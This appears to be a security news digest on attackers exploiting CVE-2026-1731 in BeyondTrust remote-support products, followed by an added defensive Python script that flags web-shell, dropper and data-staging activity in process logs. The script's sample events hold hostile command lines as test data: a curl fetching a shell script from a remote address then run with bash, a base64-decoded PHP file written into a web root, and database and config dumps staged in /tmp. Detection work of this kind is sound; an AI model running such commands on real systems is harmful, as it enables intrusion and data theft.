BeyondTrust Flaw Sparks Global Web Shell Campaigns and Data Theft

TL;DR Summary
Threat actors are exploiting CVE-2026-1731 in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) to run operating-system commands, deploy web shells and backdoors, establish command-and-control (C2), and exfiltrate data from organisations across sectors worldwide. Unit 42 reports that attackers reach the thin-scc-wrapper component over WebSocket to execute commands in the site user's context, which amounts to control of the appliance and the remote-support traffic it brokers. Observed campaigns include PHP backdoors, VShell, a bash dropper, and Spark RAT, followed by staged exfiltration of configuration files, internal databases, and PostgreSQL dumps. The tradecraft mirrors the exploitation of the earlier BeyondTrust RS/PRA command-injection flaw CVE-2024-12356, and CISA has added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog with the note that it is used in ransomware campaigns.
- BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration The Hacker News
- VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731) Unit 42
- CISA: BeyondTrust RCE flaw now exploited in ransomware attacks BleepingComputer
- BeyondTrust Remote Support exploitation ramps up with backdoors, remote tools Cybersecurity Dive
- Hospitals at Risk of BeyondTrust Ransomware Hacks Bank Info Security
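The post-exploitation chain summarised above (web shell spawning shells as the web-facing service account, a downloaded bash dropper, database and configuration material staged for exfiltration) is something a responder can hunt for in process-audit telemetry even without the attackers' exact artefacts. The following triage script is an added example, not code from The Hacker News, Unit 42 or BeyondTrust: it scores constructed `key=value` process events against a handful of behavioural rules. The service-account names, the `/var/www` web root, the staging directories and every sample line are assumptions made for illustration; no BeyondTrust-specific paths or indicators are claimed.

```python
"""Behavioural triage for web-shell, dropper and exfil-staging activity.

Added example (not from the article or the vendor). Log format, account
names and paths are assumed placeholders, not appliance internals.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

WEB_USERS = {"www-data", "site"}               # assumed web-facing accounts
SHELLS = {"sh", "bash", "dash"}
DOWNLOADERS = {"curl", "wget"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
WEB_ROOT_PHP = re.compile(r"/var/www/\S+\.php")  # assumed web root
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class ProcEvent:
    user: str
    parent: str
    comm: str
    cmdline: str


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one constructed audit line; None if a required field is missing."""
    kv = dict(KV_RE.findall(line))
    try:
        return ProcEvent(kv["user"], kv["parent"], kv["comm"], kv["cmdline"].strip('"'))
    except KeyError:
        return None


def triage(lines: List[str]) -> List[Finding]:
    """Apply behavioural rules to each event; a line may match several rules."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        if ev is None:
            continue
        in_staging = any(d in ev.cmdline for d in STAGING_DIRS)
        # Web service account spawning a shell: what command injection or a
        # web shell looks like from the process tree.
        if ev.user in WEB_USERS and ev.comm in SHELLS:
            findings.append(Finding(n, "webshell-exec", f"{ev.parent} -> {ev.cmdline}"))
        # Web service account writing a .php file under the web root.
        if ev.user in WEB_USERS and WEB_ROOT_PHP.search(ev.cmdline):
            findings.append(Finding(n, "webshell-drop", ev.cmdline))
        # Web service account fetching remote content (bash dropper stage).
        if ev.user in WEB_USERS and ev.comm in DOWNLOADERS:
            findings.append(Finding(n, "dropper-fetch", ev.cmdline))
        # Database dump written to a world-writable directory, not a backup path.
        if ev.comm == "pg_dump" and in_staging:
            findings.append(Finding(n, "db-dump-staged", ev.cmdline))
        # Archive of config material placed in a staging directory.
        if ev.comm == "tar" and in_staging:
            findings.append(Finding(n, "archive-staged", ev.cmdline))
    return findings


def count_by_rule(findings: List[Finding]) -> Dict[str, int]:
    return dict(Counter(f.rule for f in findings))


# Constructed sample events; 198.51.100.7 is a documentation address.
SAMPLE_LOG = [
    'user=www-data parent=php-fpm comm=sh cmdline="sh -c id"',
    "user=www-data parent=sh comm=sh cmdline=\"sh -c 'echo PD9waHA= | base64 -d > /var/www/app/cache/x.php'\"",
    'user=www-data parent=sh comm=curl cmdline="curl -fsSL http://198.51.100.7/d.sh -o /tmp/d.sh"',
    'user=www-data parent=sh comm=bash cmdline="bash /tmp/d.sh"',
    'user=postgres parent=bash comm=pg_dump cmdline="pg_dump -U postgres appdb -f /tmp/.cache/appdb.sql"',
    'user=www-data parent=bash comm=tar cmdline="tar czf /tmp/.cache/cfg.tgz /etc/app/config.ini"',
    'user=root parent=cron comm=sh cmdline="sh /usr/local/bin/rotate-logs.sh"',   # benign
    'user=postgres parent=cron comm=pg_dump cmdline="pg_dump appdb -f /var/backups/appdb.sql"',  # benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no:2d} {f.rule:15s} {f.detail}")
    print(count_by_rule(triage(SAMPLE_LOG)))
```

The two benign lines show why the rules key on the actor and the destination rather than on the tool: a scheduled `pg_dump` into the backup path and root's cron-driven shell produce no findings, while the same binaries driven by the web-facing account or writing into `/tmp` do. On a real appliance the account names, web root and audit format must be replaced with the vendor's, and a hit is a lead for forensic review rather than proof of compromise.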
Read the original article on The Hacker News.